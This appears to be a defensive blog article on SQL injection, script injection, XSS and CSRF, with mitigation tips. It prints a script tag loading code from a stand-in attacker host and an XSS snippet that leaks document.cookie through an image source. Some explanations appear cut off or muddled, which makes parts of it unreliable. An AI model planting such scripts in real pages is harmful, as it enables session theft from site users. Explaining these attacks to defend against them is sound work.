Defense against Common Web Attacks

SQL Injection

Today, most websites are dynamic, for example, CMS websites, transaction websites, and P2P/P2C websites. These websites use languages such as PHP, .Net, Java, ROR, Python, and NodeJS for backend development, and MySQL, Oracle, and SQL Server databases for data storage. SQL injection is a type of attack that is specifically designed to target such websites. Let us examine how SQL injection works.

  • Escape SQL wherever SQL parameter transfer occurs and always escape SQL-sensitive characters.
  • Do not directly concatenate strings.

Script Injection

When you see an unexpected script like <script src="http://hacker.test/hack.js"></script> on your web page, your page has probably suffered from a script injection attack. There are multiple ways of executing script injection attacks, such as modifying the web page by obtaining server permissions, injecting scripts through SQL injection methods, and injecting scripts by exploiting web page interaction vulnerabilities. To make matters worse, script injection and SQL injection vulnerability scanning robots for scanning web site vulnerabilities are easily available on the internet.

Cross Site Scripting (XSS) attacks

XSS is just one of many script injection attack methods, but it is very popular among hackers as it allows them to inject scripts easily. The following is a simple example of an XSS attack:

var i = document.createElement('img');
i.setAttribute('src', ''+document.cookie);
  1. Always check parameters, and adopt HTML escape for content submitted on the page.
  2. Use URL encode escape for content submitted through the URL.
  3. Set up human-machine identification (such as by using verification codes) at the login and sign-up entry-points.

Cross-Site Request Forgery (CSRF)

Many users do not fully understand the differences of CSRF with XSS. Common XSS attacks are specific to websites, and work by injecting scripts to web sites to obtain user information. Comparatively, CSRF is more advanced as it can bypass injection and enable hackers to obtain user information directly without hacking users’ cookie information.

  • Ensuring correct usage of GET
    We use GET when we do not need to make changes to resource attributes such as viewing, enumerating, and displaying. Since the URL displays the GET parameter, it is easy to use but also suffers from poor security. Thus, you should avoid opening insecure ports using GET.
  • Appending a token to the request address and verify the token later
    In addition to using GET correctly, you can use non-GET requests (such as POST) to create, modify, and delete resources as well as to perform some other sensitive operations. In the meantime, you need to generate a unique token for each user, store the token in a cookie or local storage and append it to POST requests. However, this method is defective as XSS can easily hack users’ cookie or local storage.
  • Adding a custom attribute in the HTTP header and verify the attribute later
    Similarly, this method uses tokens for authentication. However, it does not append tokens to HTTP requests as parameters but appends them to a custom attribute in the HTTP header. By using the XMLHttpRequest class, you can append the csrftoken HTTP header attribute to all requests of this class at one time, while assigning token values to the attribute. This prevents the system from displaying the address requested through XMLHttpRequest in the address bar of the browser, which in turn helps stop the leakage of tokens to other websites through Referer.
  • Using pseudo-random numbers for different lists
    Different lists contain different pseudo-random numbers. In fact, multiple popular open-source web frameworks, such as Drupal for PHP and Flask for Python, follow this practice. Here are the operating principles of pseudo-random numbers:
  • On the generation of a page list, the backend server generates a pseudo-random number, places it in a hidden field of the list and caches the pseudo-random number on the backend.
  • Upon submitting the list, the backend server verifies that the pseudo-random number is correct and in working condition while deleting the cached pseudo-random number.


In this article, we discussed some of the common web-based attacks that websites and users suffer from, including SQL injections, script injections, XSS attacks, and CSRF. We looked at how each of them works, while also prescribing some steps that can help defend against such attacks.



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store